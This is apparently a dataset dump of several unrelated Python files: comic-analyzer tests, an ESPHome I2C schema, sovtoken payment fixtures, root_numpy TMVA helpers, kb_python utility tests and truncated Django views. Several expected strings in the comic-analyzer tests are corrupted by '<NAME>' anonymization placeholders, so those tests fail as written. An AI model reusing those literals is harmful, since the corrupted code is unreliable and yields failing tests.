    assert analyzer.look_behind(text, len(text) + 1) == "Wonder Woman"
# TODO: write better test examples
def test_convert_character_dict_to_str():
    # NOTE(review): '<NAME>' looks like an anonymization artifact; the
    # expected string below says 'Clark Kent', so this test likely fails as
    # written -- restore the original literal.
    character_dict = {
        "Teams": {"Justice League": {"Batman": "Bruce Wayne", "Superman": "<NAME>"}}
    }
    results = analyzer.convert_character_dict_to_str(character_dict)
    assert results == "Justice League: Batman: Bruce Wayne; Superman: Clark Kent"
def test_diff_strings():
    """diff_strings returns what the second string adds beyond the first."""
    full = "Hello World!"
    prefix = "Hello"
    assert analyzer.diff_strings(prefix, full) == " World!"
    assert analyzer.diff_strings(full, prefix) == ""
def test_convert_characters_to_list():
    # NOTE(review): '<NAME>ent' in the expected output is an anonymization
    # artifact (should read 'Clark Kent/ Kal-El'); this test likely fails as
    # written -- restore the original literal.
    s = "Superman [Clark Kent; Kal-El]; Batman [Bruce Wayne]; Wonder Woman [Diana Prince]"
    results = analyzer.convert_characters_to_list(s)
    assert results == [
        "Superman [<NAME>ent/ Kal-El]",
        "Batman [Bruce Wayne]",
        "Wonder Woman [Diana Prince]",
    ]
def test_get_random_sample_of_covers():
    # TODO(review): placeholder -- no behavior is exercised yet.
    assert True
def test_create_training_dirs():
    # TODO(review): placeholder -- no behavior is exercised yet.
    assert True
def test_search_row():
    """The Fantastic Four #187 entry lives on row 2 of the labels file."""
    issue = "Fantastic Four: Fantastic Four #187 30¢ ()"
    assert analyzer.search_row(file_name=labels_path, string=issue) == 2
# # TODO: how to test this method w/ side-effects?
# def test_replace_line():
# issue = "Fantastic Four: Fantastic Four #187 30¢ ()"
# labels = "Human Torch Johnny Storm|The Thing <NAME>|Mr. Fantastic Reed Richards|Invisible Woman Sue Storm Richards"
# analyzer.replace_line(file_name=labels_path, row=2, text="/t".join[issue, labels])
def test_update_label():
    # Rewrites row 2 of the bunch's labels file, then re-reads that row.
    # NOTE(review): 'Re<NAME>ards' in the expected line is an anonymization
    # artifact; the label list says 'Reed Richards' -- restore the literal.
    issue = "Fantastic Four: Fantastic Four #187 30¢ ()"
    label = ["Dr. Doom", "<NAME>"]
    image_bunch = "./comics_net/resources/fantastic_four/"
    analyzer.update_label(image_bunch=image_bunch, file_name=issue, label=label)
    with open(image_bunch + "labels_updated.txt", "r") as f:
        for i, row in enumerate(f):
            if i == 2:
                assert (
                    row
                    == "Fantastic Four: Fantastic Four #187 30¢ ()\tDr. Doom|Re<NAME>ards\n"
                )
def test_remove_images():
    """After excluding two files the updated labels file holds 3 rows."""
    image_bunch = "./comics_net/resources/fantastic_four"
    files_to_exclude = [
        "She-Hulk: She-Hulk #12 Original ().jpg",
        "Marvel Mystery Comics: Marvel Mystery Comics #43 Original (1943-03-22).jpg",
    ]
    analyzer.remove_images(image_bunch, files_to_exclude)
    with open(image_bunch + "_updated/labels_updated.txt", "r") as f:
        assert sum(1 for _ in f) == 3
3444589 | import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import pins
from esphome.const import (
CONF_FREQUENCY,
CONF_ID,
CONF_INPUT,
CONF_OUTPUT,
CONF_SCAN,
CONF_SCL,
CONF_SDA,
CONF_ADDRESS,
CONF_I2C_ID,
)
from esphome.core import coroutine_with_priority, CORE
CODEOWNERS = ["@esphome/core"]
# C++ namespace and class bindings used by the code generator below.
i2c_ns = cg.esphome_ns.namespace("i2c")
I2CBus = i2c_ns.class_("I2CBus")
ArduinoI2CBus = i2c_ns.class_("ArduinoI2CBus", I2CBus, cg.Component)
IDFI2CBus = i2c_ns.class_("IDFI2CBus", I2CBus, cg.Component)
I2CDevice = i2c_ns.class_("I2CDevice")
# Config keys not provided by esphome.const.
CONF_SDA_PULLUP_ENABLED = "sda_pullup_enabled"
CONF_SCL_PULLUP_ENABLED = "scl_pullup_enabled"
# Presumably allows multiple i2c: blocks (multiple buses) in one YAML config.
MULTI_CONF = True
def _bus_declare_type(value):
    """Pick the I2C bus implementation class matching the active framework."""
    if CORE.using_arduino:
        bus_class = ArduinoI2CBus
    elif CORE.using_esp_idf:
        bus_class = IDFI2CBus
    else:
        raise NotImplementedError
    return cv.declare_id(bus_class)(value)
# An I2C pin must support both input and output modes.
pin_with_input_and_output_support = cv.All(
    pins.internal_gpio_pin_number({CONF_INPUT: True}),
    pins.internal_gpio_pin_number({CONF_OUTPUT: True}),
)
CONFIG_SCHEMA = cv.Schema(
    {
        cv.GenerateID(): _bus_declare_type,
        cv.Optional(CONF_SDA, default="SDA"): pin_with_input_and_output_support,
        # Internal pull-up toggles are only valid under ESP-IDF.
        cv.SplitDefault(CONF_SDA_PULLUP_ENABLED, esp32_idf=True): cv.All(
            cv.only_with_esp_idf, cv.boolean
        ),
        cv.Optional(CONF_SCL, default="SCL"): pin_with_input_and_output_support,
        cv.SplitDefault(CONF_SCL_PULLUP_ENABLED, esp32_idf=True): cv.All(
            cv.only_with_esp_idf, cv.boolean
        ),
        # Bus frequency must be strictly positive.
        cv.Optional(CONF_FREQUENCY, default="50kHz"): cv.All(
            cv.frequency, cv.Range(min=0, min_included=False)
        ),
        cv.Optional(CONF_SCAN, default=True): cv.boolean,
    }
).extend(cv.COMPONENT_SCHEMA)
@coroutine_with_priority(1.0)
async def to_code(config):
    # Emit C++ code for the I2C bus component from the validated config.
    cg.add_global(i2c_ns.using)
    var = cg.new_Pvariable(config[CONF_ID])
    await cg.register_component(var, config)
    cg.add(var.set_sda_pin(config[CONF_SDA]))
    if CONF_SDA_PULLUP_ENABLED in config:
        cg.add(var.set_sda_pullup_enabled(config[CONF_SDA_PULLUP_ENABLED]))
    cg.add(var.set_scl_pin(config[CONF_SCL]))
    if CONF_SCL_PULLUP_ENABLED in config:
        cg.add(var.set_scl_pullup_enabled(config[CONF_SCL_PULLUP_ENABLED]))
    cg.add(var.set_frequency(int(config[CONF_FREQUENCY])))
    cg.add(var.set_scan(config[CONF_SCAN]))
    if CORE.using_arduino:
        # The Arduino framework needs the Wire library for I2C support.
        cg.add_library("Wire", None)
def i2c_device_schema(default_address):
    """Create a schema for a i2c device.

    :param default_address: The default address of the i2c device, can be None to represent
        a required option.
    :return: The i2c device schema, `extend` this in your config schema.
    """
    address_key = (
        cv.Required(CONF_ADDRESS)
        if default_address is None
        else cv.Optional(CONF_ADDRESS, default=default_address)
    )
    return cv.Schema(
        {
            cv.GenerateID(CONF_I2C_ID): cv.use_id(I2CBus),
            cv.Optional("multiplexer"): cv.invalid(
                "This option has been removed, please see "
                "the tca9584a docs for the updated way to use multiplexers"
            ),
            address_key: cv.i2c_address,
        }
    )
async def register_i2c_device(var, config):
    """Register an i2c device with the given config.

    Sets the i2c bus to use and the i2c address.

    This is a coroutine, you need to await it with an 'await' expression!
    """
    parent = await cg.get_variable(config[CONF_I2C_ID])
    cg.add(var.set_i2c_bus(parent))
    cg.add(var.set_i2c_address(config[CONF_ADDRESS]))
| StarcoderdataPython |
1620668 | import json
import pytest
from sovtoken import TokenTransactions, TOKEN_LEDGER_ID
from sovtoken.request_handlers.write_request_handler.xfer_handler import XferHandler
from sovtoken.request_handlers.write_request_handler.xfer_handler_1_0_0 import XferHandler100
from sovtoken.sovtoken_auth_map import sovtoken_auth_map
from base58 import b58encode_check
from indy.payment import build_payment_req
from indy_node.test.conftest import write_auth_req_validator, constraint_serializer, config_state, idr_cache
from sovtoken.test.helper import libsovtoken_address_to_address
from plenum.common.txn_util import append_txn_metadata
from plenum.test.helper import sdk_json_to_request_object
@pytest.fixture(scope="module")
def xfer_handler(utxo_cache, db_manager, write_auth_req_validator, mint_tokens):
    # Current-version XFER handler; token auth rules are merged in first.
    write_auth_req_validator.auth_map.update(sovtoken_auth_map)
    return XferHandler(db_manager,
                       write_req_validator=write_auth_req_validator)
@pytest.fixture(scope="module")
def xfer_handler_1_0_0(utxo_cache, db_manager, write_auth_req_validator, mint_tokens):
    # Legacy 1.0.0 XFER handler, built the same way as xfer_handler.
    write_auth_req_validator.auth_map.update(sovtoken_auth_map)
    return XferHandler100(db_manager,
                          write_req_validator=write_auth_req_validator)
@pytest.fixture(scope="module")
def mint_tokens(payment_address, utxo_cache, db_manager):
    # Seed the UTXO cache and token state with 10 tokens at seqNo 1.
    addr = libsovtoken_address_to_address(payment_address)
    utxo_cache.set(addr, "1:10".encode())
    db_manager.get_state(TOKEN_LEDGER_ID).set((addr + ":1").encode(), "10".encode())
@pytest.fixture()
def xfer_request(libsovtoken, payment_address, payment_address_2, wallet, looper):
    # Valid XFER: spend the whole minted 10-token UTXO to the second address.
    input = make_utxo(payment_address, 1)
    output = payment_address_2
    xfer_request_future = build_payment_req(wallet, None, json.dumps([input]),
                                            json.dumps([{"recipient": output, "amount": 10}]), None)
    xfer_request, _ = looper.loop.run_until_complete(xfer_request_future)
    xfer_request = sdk_json_to_request_object(json.loads(xfer_request))
    return xfer_request
@pytest.fixture()
def invalid_amount_xfer_request_insufficient(libsovtoken, payment_address, payment_address_2, wallet, looper):
    # Invalid XFER: output of 11 exceeds the 10 tokens held by the input UTXO.
    input = make_utxo(payment_address, 1)
    output = payment_address_2
    xfer_request_future = build_payment_req(wallet, None, json.dumps([input]),
                                            json.dumps([{"recipient": output, "amount": 11}]), None)
    xfer_request, _ = looper.loop.run_until_complete(xfer_request_future)
    xfer_request = sdk_json_to_request_object(json.loads(xfer_request))
    return xfer_request
@pytest.fixture()
def invalid_amount_xfer_request_excessive(libsovtoken, payment_address, payment_address_2, wallet, looper):
    # Invalid XFER: output of 9 leaves 1 of the input's 10 tokens unaccounted.
    input = make_utxo(payment_address, 1)
    output = payment_address_2
    xfer_request_future = build_payment_req(wallet, None, json.dumps([input]),
                                            json.dumps([{"recipient": output, "amount": 9}]), None)
    xfer_request, _ = looper.loop.run_until_complete(xfer_request_future)
    xfer_request = sdk_json_to_request_object(json.loads(xfer_request))
    return xfer_request
@pytest.fixture()
def invalid_amount_xfer_request_utxo_does_not_exist(libsovtoken, payment_address, payment_address_2, wallet, looper):
    # Invalid XFER: references seqNo 2, which was never minted (only seqNo 1).
    input = make_utxo(payment_address, 2)
    output = payment_address_2
    xfer_request_future = build_payment_req(wallet, None, json.dumps([input]),
                                            json.dumps([{"recipient": output, "amount": 9}]), None)
    xfer_request, _ = looper.loop.run_until_complete(xfer_request_future)
    xfer_request = sdk_json_to_request_object(json.loads(xfer_request))
    return xfer_request
@pytest.fixture()
def xfer_txn(xfer_handler, xfer_request):
    # Convert the request to a txn and stamp seqNo/time metadata onto it.
    xfer_txn = xfer_handler._req_to_txn(xfer_request)
    return append_txn_metadata(xfer_txn, 2, 1, 1)
def make_utxo(addr, seq_no):
    """Encode (address, seqNo) as a libsovtoken txo reference string."""
    payload = json.dumps({"address": addr, "seqNo": seq_no}).encode()
    checksummed = b58encode_check(payload).decode()
    return "txo:sov:" + checksummed
| StarcoderdataPython |
5072085 | <reponame>douglasdavis/root_numpy<gh_stars>10-100
import numpy as np
import ROOT
from ROOT import TMVA
from . import _libtmvanumpy
from .. import ROOT_VERSION
__all__ = [
    'add_classification_events',
    'add_regression_events',
]

# TMVA moved factory data loading onto TMVA::DataLoader in ROOT 6.07/04;
# the functions below switch their type checks on this flag.
NEW_TMVA_API = ROOT_VERSION >= '6.07/04'
def add_classification_events(obj, events, labels, signal_label=None,
                              weights=None, test=False):
    """Add classification events to a TMVA::Factory or TMVA::DataLoader from NumPy arrays.

    Parameters
    ----------
    obj : TMVA::Factory or TMVA::DataLoader
        A TMVA::Factory or TMVA::DataLoader (TMVA's interface as of ROOT
        6.07/04) instance with variables already booked in exactly the same
        order as the columns in ``events``.
    events : numpy array of shape [n_events, n_variables]
        A two-dimensional NumPy array containing the rows of events and columns
        of variables. The order of the columns must match the order in which
        you called ``AddVariable()`` for each variable.
    labels : numpy array of shape [n_events]
        The class labels (signal or background) corresponding to each event in
        ``events``.
    signal_label : float or int, optional (default=None)
        The value in ``labels`` for signal events, if ``labels`` contains only
        two classes. If None, the highest value in ``labels`` is used.
    weights : numpy array of shape [n_events], optional
        Event weights.
    test : bool, optional (default=False)
        If True, then the events will be added as test events, otherwise they
        are added as training events by default.

    Notes
    -----
    * A TMVA::Factory or TMVA::DataLoader requires you to add both training and
      test events even if you don't intend to call ``TestAllMethods()``.

    * When using MethodCuts, the first event added must be a signal event,
      otherwise TMVA will fail with ``<FATAL> Interval : maximum lower than
      minimum``. To place a signal event first::

          # Get index of first signal event
          first_signal = np.nonzero(labels == signal_label)[0][0]
          # Swap this with first event
          events[0], events[first_signal] = events[first_signal].copy(), events[0].copy()
          labels[0], labels[first_signal] = labels[first_signal], labels[0]
          weights[0], weights[first_signal] = weights[first_signal], weights[0]
    """
    # Reject the wrong container type for the detected TMVA API generation.
    if NEW_TMVA_API:  # pragma: no cover
        if not isinstance(obj, TMVA.DataLoader):
            raise TypeError(
                "obj must be a TMVA.DataLoader "
                "instance for ROOT >= 6.07/04")
    else:  # pragma: no cover
        if not isinstance(obj, TMVA.Factory):
            raise TypeError(
                "obj must be a TMVA.Factory instance")
    # The C extension expects contiguous float64 data.
    events = np.ascontiguousarray(events, dtype=np.float64)
    if events.ndim == 1:
        # convert to 2D
        events = events[:, np.newaxis]
    elif events.ndim != 2:
        raise ValueError(
            "events must be a two-dimensional array "
            "with one event per row")
    # np.unique returns the sorted distinct labels; class_idx maps each event
    # to its label's index in that sorted array.
    class_labels, class_idx = np.unique(labels, return_inverse=True)
    if class_idx.shape[0] != events.shape[0]:
        raise ValueError("numbers of events and labels do not match")
    if weights is not None:
        weights = np.asarray(weights, dtype=np.float64)
        if weights.shape[0] != events.shape[0]:
            raise ValueError("numbers of events and weights do not match")
        if weights.ndim != 1:
            raise ValueError("weights must be one-dimensional")
    n_classes = class_labels.shape[0]
    if n_classes > 2:
        # multiclass classification
        _libtmvanumpy.add_events_multiclass(
            ROOT.AsCObject(obj), events, class_idx,
            weights, test)
    elif n_classes == 2:
        # binary classification
        if signal_label is None:
            # Default: the highest label value is signal (class_labels is sorted).
            signal_label = class_labels[1]
        # Translate the label value into its index within class_labels.
        signal_label = np.where(class_labels == signal_label)[0][0]
        _libtmvanumpy.add_events_twoclass(
            ROOT.AsCObject(obj), events, class_idx,
            signal_label, weights, test)
    else:
        raise ValueError("labels must contain at least two classes")
def add_regression_events(obj, events, targets, weights=None, test=False):
    """Add regression events to a TMVA::Factory or TMVA::DataLoader from NumPy arrays.

    Parameters
    ----------
    obj : TMVA::Factory or TMVA::DataLoader
        A TMVA::Factory or TMVA::DataLoader (TMVA's interface as of ROOT
        6.07/04) instance with variables already
        booked in exactly the same order as the columns in ``events``.
    events : numpy array of shape [n_events, n_variables]
        A two-dimensional NumPy array containing the rows of events and columns
        of variables. The order of the columns must match the order in which
        you called ``AddVariable()`` for each variable.
    targets : numpy array of shape [n_events] or [n_events, n_targets]
        The target value(s) for each event in ``events``. For multiple target
        values, ``targets`` must be a two-dimensional array with a column for
        each target in the same order in which you called ``AddTarget()``.
    weights : numpy array of shape [n_events], optional
        Event weights.
    test : bool, optional (default=False)
        If True, then the events will be added as test events, otherwise they
        are added as training events by default.

    Notes
    -----
    A TMVA::Factory or TMVA::DataLoader requires you to add both training and
    test events even if you don't intend to call ``TestAllMethods()``.
    """
    # Reject the wrong container type for the detected TMVA API generation.
    if NEW_TMVA_API:  # pragma: no cover
        if not isinstance(obj, TMVA.DataLoader):
            raise TypeError(
                "obj must be a TMVA.DataLoader "
                "instance for ROOT >= 6.07/04")
    else:  # pragma: no cover
        if not isinstance(obj, TMVA.Factory):
            raise TypeError(
                "obj must be a TMVA.Factory instance")
    # The C extension expects contiguous float64 data.
    events = np.ascontiguousarray(events, dtype=np.float64)
    if events.ndim == 1:
        # convert to 2D
        events = events[:, np.newaxis]
    elif events.ndim != 2:
        raise ValueError(
            "events must be a two-dimensional array "
            "with one event per row")
    targets = np.asarray(targets, dtype=np.float64)
    if targets.shape[0] != events.shape[0]:
        raise ValueError("the lengths of events and targets do not match")
    if targets.ndim == 1:
        # convert to 2D
        targets = targets[:, np.newaxis]
    elif targets.ndim > 2:
        raise ValueError("targets can not have more than two dimensions")
    if weights is not None:
        weights = np.asarray(weights, dtype=np.float64)
        if weights.shape[0] != events.shape[0]:
            raise ValueError("numbers of events and weights do not match")
        if weights.ndim != 1:
            raise ValueError("weights must be one-dimensional")
    _libtmvanumpy.add_events_regression(
        ROOT.AsCObject(obj), events, targets, weights, test)
327840 | import gzip
import os
import subprocess as sp
import tempfile
import uuid
from unittest import mock, TestCase
from unittest.mock import call
import anndata
import kb_python.utils as utils
from kb_python.config import CHUNK_SIZE, UnsupportedOSException
from tests.mixins import TestMixin
def dry_dummy_function(i):
    """Stand-in 'dry run' implementation: returns its argument incremented."""
    return i + 1
@utils.dryable(dry_dummy_function)
def dummy_function(i):
    # Identity when dry mode is off; the dryable decorator substitutes
    # dry_dummy_function when dry mode is on (see the tests below).
    return i
class TestUtils(TestMixin, TestCase):
def test_dryable_not_dry(self):
    """With dry mode off, the decorated function runs unchanged."""
    with mock.patch('kb_python.utils.is_dry', return_value=False):
        self.assertEqual(1, dummy_function(1))
def test_dryable_dry(self):
    """With dry mode on, the dry stand-in (i + 1) runs instead."""
    with mock.patch('kb_python.utils.is_dry', return_value=True):
        self.assertEqual(2, dummy_function(1))
def test_open_as_text_textfile(self):
    """open_as_text round-trips plain .txt files."""
    path = os.path.join(
        tempfile.gettempdir(), '{}.txt'.format(uuid.uuid4())
    )
    with utils.open_as_text(path, 'w') as f:
        f.write('TESTING')
    self.assertTrue(os.path.exists(path))
    with utils.open_as_text(path, 'r') as f:
        self.assertEqual('TESTING', f.read())
def test_open_as_text_gzip(self):
    """open_as_text transparently round-trips .gz files as text."""
    path = os.path.join(tempfile.gettempdir(), '{}.gz'.format(uuid.uuid4()))
    with utils.open_as_text(path, 'w') as f:
        f.write('TESTING')
    self.assertTrue(os.path.exists(path))
    with utils.open_as_text(path, 'r') as f:
        self.assertEqual('TESTING', f.read())
def test_decompress_gzip(self):
    # Round-trip: write gzipped text, decompress it, compare the contents.
    filename = str(uuid.uuid4())
    gzip_path = os.path.join(
        tempfile.gettempdir(), '{}.gz'.format(filename)
    )
    out_path = os.path.join(tempfile.gettempdir(), filename)
    with gzip.open(gzip_path, 'wt') as f:
        f.write('TESTING\nTEST')
    self.assertEqual(out_path, utils.decompress_gzip(gzip_path, out_path))
    self.assertTrue(os.path.exists(out_path))
    with open(out_path, 'r') as f:
        self.assertEqual('TESTING\nTEST', f.read())
def test_compress_gzip(self):
    # Round-trip: write plain text, compress it, read back through gzip.
    filename = str(uuid.uuid4())
    file_path = os.path.join(tempfile.gettempdir(), filename)
    out_path = os.path.join(tempfile.gettempdir(), '{}.gz'.format(filename))
    with open(file_path, 'w') as f:
        f.write('TESTING\nTEST')
    self.assertEqual(out_path, utils.compress_gzip(file_path, out_path))
    self.assertTrue(os.path.exists(out_path))
    with gzip.open(out_path, 'rt') as f:
        self.assertEqual('TESTING\nTEST', f.read())
def test_make_directory(self):
    # make_directory must delegate to os.makedirs with exist_ok=True.
    with mock.patch('kb_python.utils.os.makedirs') as makedirs:
        utils.make_directory('path')
        makedirs.assert_called_once_with('path', exist_ok=True)
def test_remove_directory(self):
    # remove_directory must delegate to shutil.rmtree, ignoring errors.
    with mock.patch('kb_python.utils.shutil.rmtree') as rmtree:
        utils.remove_directory('path')
        rmtree.assert_called_once_with('path', ignore_errors=True)
def test_run_executable(self):
    # Non-streaming run exposes the subprocess stdout for reading.
    p = utils.run_executable(['echo', 'TEST'], stream=False)
    self.assertEqual(p.stdout.read(), 'TEST\n')
def test_run_exectuable_raises_exception(self):
    # NOTE(review): "exectuable" is a typo, but renaming would change the
    # collected test id, so it is left as-is.
    with self.assertRaises(sp.SubprocessError):
        utils.run_executable(['bash', 'nonexistent option'])
def test_run_exectuable_with_returncode(self):
    # Passing returncode=127 presumably whitelists that exit code, since the
    # same command raises in the test above -- confirm in utils.run_executable.
    utils.run_executable(['bash', 'nonexistent option'], returncode=127)
def test_run_executable_no_wait(self):
    # With wait=False the subprocess must not be polled for completion.
    with mock.patch('kb_python.utils.sp') as sp_mock:
        sp_mock.Popen().returncode = 0
        utils.run_executable(['echo', 'TEST'], wait=False)
        sp_mock.Popen().poll.assert_not_called()
def test_run_executable_with_stream(self):
    # Streaming mode forwards subprocess output lines to logger.debug.
    with mock.patch('kb_python.utils.logger.debug') as debug_mock:
        utils.run_executable(['echo', 'TEST'], stream=True)
        debug_mock.assert_has_calls([call('TEST')])
def test_run_chain(self):
    # Piped commands: the last process's stdout carries the chained output.
    ps = utils.run_chain(['echo', 'TEST'], ['grep', 'T'])
    self.assertEqual(ps[1].stdout.read(), 'TEST\n')
    def test_run_chain_fails_single_command(self):
        """run_chain requires at least two commands; a single one should assert."""
        with self.assertRaises(AssertionError):
            utils.run_chain(['echo', 'TEST'])
    def test_run_chain_raises_exception_when_dead(self):
        """run_chain should raise if an intermediate process in the pipe dies."""
        with self.assertRaises(sp.SubprocessError):
            utils.run_chain(['sleep', '5'], ['grep', 'TEST'], ['ls'])
    def test_get_kallisto_version(self):
        """get_kallisto_version should parse 'kallisto X.Y.Z' into an int tuple."""
        with mock.patch('kb_python.utils.run_executable') as run_executable:
            run_executable().stdout.read.return_value = 'kallisto 1.2.3'
            self.assertEqual((1, 2, 3), utils.get_kallisto_version())
    def test_get_bustools_version(self):
        """get_bustools_version should parse 'bustools X.Y.Z' into an int tuple."""
        with mock.patch('kb_python.utils.run_executable') as run_executable:
            run_executable().stdout.read.return_value = 'bustools 1.2.3'
            self.assertEqual((1, 2, 3), utils.get_bustools_version())
    def test_parse_technologies(self):
        """parse_technologies should extract the short names from a `kallisto bus -l`-style table."""
        lines = [
            'short name description',
            '---------- -----------',
            '10xv1 10x version 1 chemistry',
            '10xv2 10x version 2 chemistry',
        ]
        self.assertEqual(utils.parse_technologies(lines), {'10xv1', '10xv2'})
    def test_get_supported_technologies(self):
        """get_supported_technologies should feed the executable's stdout into parse_technologies."""
        with mock.patch('kb_python.utils.run_executable') as run_executable,\
                mock.patch('kb_python.utils.parse_technologies') as parse_technologies:
            run_executable().stdout = 'TEST'
            utils.get_supported_technologies()
            parse_technologies.assert_called_once_with('TEST')
    def test_whitelist_provided(self):
        """whitelist_provided should be True only for technologies bundled with a whitelist."""
        self.assertTrue(utils.whitelist_provided('10xv2'))
        self.assertFalse(utils.whitelist_provided('UNSUPPORTED'))
    def test_download_file(self):
        """download_file should stream the response in CHUNK_SIZE chunks, drive a tqdm progress bar, and write the bytes to disk."""
        with mock.patch('kb_python.utils.requests.get') as get,\
                mock.patch('kb_python.utils.tqdm') as tqdm:
            path = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
            # Two 1 KiB chunks; Content-Length drives the progress-bar total.
            get.return_value.headers = {'Content-Length': str(1024 * 2)}
            get.return_value.iter_content.return_value = [
                b'1' * 1024, b'2' * 1024
            ]
            self.assertEqual(path, utils.download_file('remote/path', path))
            get.assert_called_once_with('remote/path', stream=True)
            tqdm.assert_called_once_with(
                unit='B',
                total=1024 * 2,
                unit_divisor=1024,
                unit_scale=True,
                ascii=True
            )
            get.return_value.iter_content.assert_called_once_with(
                chunk_size=CHUNK_SIZE
            )
            self.assertEqual(2, tqdm.return_value.update.call_count)
            tqdm.return_value.update.assert_has_calls([call(1024), call(1024)])
            tqdm.return_value.close.assert_called_once_with()
            with open(path, 'r') as f:
                self.assertEqual(('1' * 1024) + ('2' * 1024), f.read())
    def test_stream_file(self):
        """On Linux, stream_file should create a FIFO and download into it on a daemon thread."""
        with mock.patch('kb_python.utils.PLATFORM', 'linux'),\
                mock.patch('kb_python.utils.os') as os,\
                mock.patch('kb_python.utils.threading') as threading,\
                mock.patch('kb_python.utils.urlretrieve') as urlretrieve:
            url = mock.MagicMock()
            path = mock.MagicMock()
            utils.stream_file(url, path)
            os.mkfifo.assert_called_once_with(path)
            threading.Thread.assert_called_once_with(
                target=urlretrieve, args=(url, path), daemon=True
            )
            threading.Thread().start.assert_called_once_with()
    def test_stream_file_windows(self):
        """On Windows (no FIFOs), stream_file should raise UnsupportedOSException and do no work."""
        with mock.patch('kb_python.utils.PLATFORM', 'windows'),\
                mock.patch('kb_python.utils.os') as os,\
                mock.patch('kb_python.utils.threading') as threading,\
                mock.patch('kb_python.utils.urlretrieve') as urlretrieve:
            url = mock.MagicMock()
            path = mock.MagicMock()
            with self.assertRaises(UnsupportedOSException):
                utils.stream_file(url, path)
            os.mkfifo.assert_not_called()
            threading.thread.assert_not_called()
            urlretrieve.assert_not_called()
    def test_import_tcc_matrix_as_anndata(self):
        """TCC matrices should load as AnnData indexed by EC (vars) and barcode (obs)."""
        adata = utils.import_tcc_matrix_as_anndata(
            self.tcc_matrix_path, self.tcc_barcodes_path, self.tcc_ec_path,
            self.tcc_txnames_path
        )
        self.assertIsInstance(adata, anndata.AnnData)
        self.assertEqual({'transcript_ids'}, set(adata.var))
        self.assertEqual(set(), set(adata.obs))
        self.assertEqual('ec', adata.var.index.name)
        self.assertEqual('barcode', adata.obs.index.name)
    def test_import_matrix_as_anndata(self):
        """Gene-count matrices should load as AnnData indexed by gene_id (vars) and barcode (obs)."""
        adata = utils.import_matrix_as_anndata(
            self.matrix_path, self.barcodes_path, self.genes_path
        )
        self.assertIsInstance(adata, anndata.AnnData)
        self.assertEqual(set(), set(adata.var))
        self.assertEqual(set(), set(adata.obs))
        self.assertEqual('gene_id', adata.var.index.name)
        self.assertEqual('barcode', adata.obs.index.name)
    def test_overlay_anndatas(self):
        """overlay_anndatas should combine spliced/unspliced matrices into named layers."""
        adata_spliced = utils.import_matrix_as_anndata(
            self.spliced_matrix_path, self.spliced_barcodes_path,
            self.spliced_genes_path
        )
        adata_unspliced = utils.import_matrix_as_anndata(
            self.unspliced_matrix_path, self.unspliced_barcodes_path,
            self.unspliced_genes_path
        )
        adata = utils.overlay_anndatas(adata_spliced, adata_unspliced)
        self.assertEqual({'spliced', 'unspliced'}, set(adata.layers.keys()))
    def test_sum_anndatas(self):
        """sum_anndatas should element-wise add the two matrices (spot-checked at [5, 15])."""
        adata_spliced = utils.import_matrix_as_anndata(
            self.spliced_matrix_path, self.spliced_barcodes_path,
            self.spliced_genes_path
        )
        adata_unspliced = utils.import_matrix_as_anndata(
            self.unspliced_matrix_path, self.unspliced_barcodes_path,
            self.unspliced_genes_path
        )
        adata = utils.sum_anndatas(adata_spliced, adata_unspliced)
        self.assertEqual(2.0, adata.X[5, 15])
    def test_copy_whitelist(self):
        """copy_whitelist should materialize the bundled 10xv1 whitelist into the given directory."""
        whitelist_path = utils.copy_whitelist('10xv1', tempfile.mkdtemp())
        self.assertTrue(os.path.exists(whitelist_path))
    def test_concatenate_files(self):
        """concatenate_files should merge plain and gzipped inputs into one newline-separated plain file."""
        temp_dir = tempfile.mkdtemp()
        file1_path = os.path.join(temp_dir, str(uuid.uuid4()))
        file2_path = os.path.join(temp_dir, '{}.gz'.format(uuid.uuid4()))
        with open(file1_path, 'w') as f:
            f.write('TEST1')
        with gzip.open(file2_path, 'wt') as f:
            f.write('TEST2')
        out_path = utils.concatenate_files(
            file1_path,
            file2_path,
            out_path=os.path.join(temp_dir, str(uuid.uuid4())),
            temp_dir=tempfile.mkdtemp()
        )
        with open(out_path, 'r') as f:
            self.assertEqual(f.read(), 'TEST1\nTEST2\n')
| StarcoderdataPython |
4980415 | <gh_stars>0
# Importing native django packages:
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import user_passes_test
from django.contrib.staticfiles.storage import staticfiles_storage
from django.templatetags.static import static
from django.conf import settings
from django.db.models.functions import TruncDay, TruncWeek, ExtractWeek, ExtractDay
from django.db.models import Count, Sum
# Importing view logic:
from .article_logic import get_article_categories, get_article_summary, get_full_article
# Importing Article forms & models:
from data_APIs.articles_api.forms import ArticleForm
from data_APIs.articles_api.models import Article
from data_APIs.reddit_api.models import RedditPosts
# Importing Frontend asset models:
from application_frontend.models import SIPRIData
# Importing data manipulation packages:
from openpyxl import load_workbook
from datetime import date, timedelta
import time
import pandas as pd
import os
# Importing visualization packages:
import plotly.graph_objects as go
import plotly.express as px
# Method that checks if user is a staff member:
def is_not_staff(user):
    """Predicate for ``user_passes_test``: returns ``user.is_staff``.

    NOTE(review): despite the name, this returns True for *staff* users,
    so the decorated views are staff-only.  Renaming would break the
    decorator references, so the name is kept as-is.
    """
    return user.is_staff
# Homepage Views:
def render_homepage(request):
    """Render the landing page, populated with the five latest article summaries."""
    latest_articles = get_article_summary(page_size=5)
    context = {"articles": latest_articles}
    return render(request, "application_frontend/homepage/homepage.html", context=context)
# Article Views:
def render_article_homepage(request):
    """Render the articles landing page: recent article summaries grouped per category."""
    # One summary query per known category, keyed by category name.
    context = {
        "categories": {
            category: get_article_summary(category=category)
            for category in get_article_categories()
        }
    }
    return render(request, "application_frontend/articles/articles_homepage_layout.html", context=context)
def render_article_full(request, slug: str):
    """Render a single complete article, looked up by its slug."""
    context = {"article": get_full_article(slug)}
    return render(request, "application_frontend/articles/full_article.html", context=context)
def render_article_category(request, category: str):
    """Render the page listing articles (up to 50) belonging to *category*.

    Args:
        category (str): The category used to filter the article summaries.
    """
    summaries = get_article_summary(category=category, page_size=50)
    return render(
        request,
        "application_frontend/articles/article_category_page.html",
        context={"articles": summaries},
    )
@user_passes_test(is_not_staff)
def create_article(request, id=None):
    """Create a new article or edit an existing one.

    GET  without *id*: render an empty :class:`ArticleForm`.
    GET  with *id*:    render the form pre-populated from ``Article`` ``id``.
    POST without *id*: validate the submission and create a new article.
    POST with *id*:    validate the submission and update article ``id``.

    On a successful save the user is redirected to the article's full page.

    BUG FIX: the original returned ``None`` (which Django turns into a 500
    "view didn't return an HttpResponse") whenever a POSTed form failed
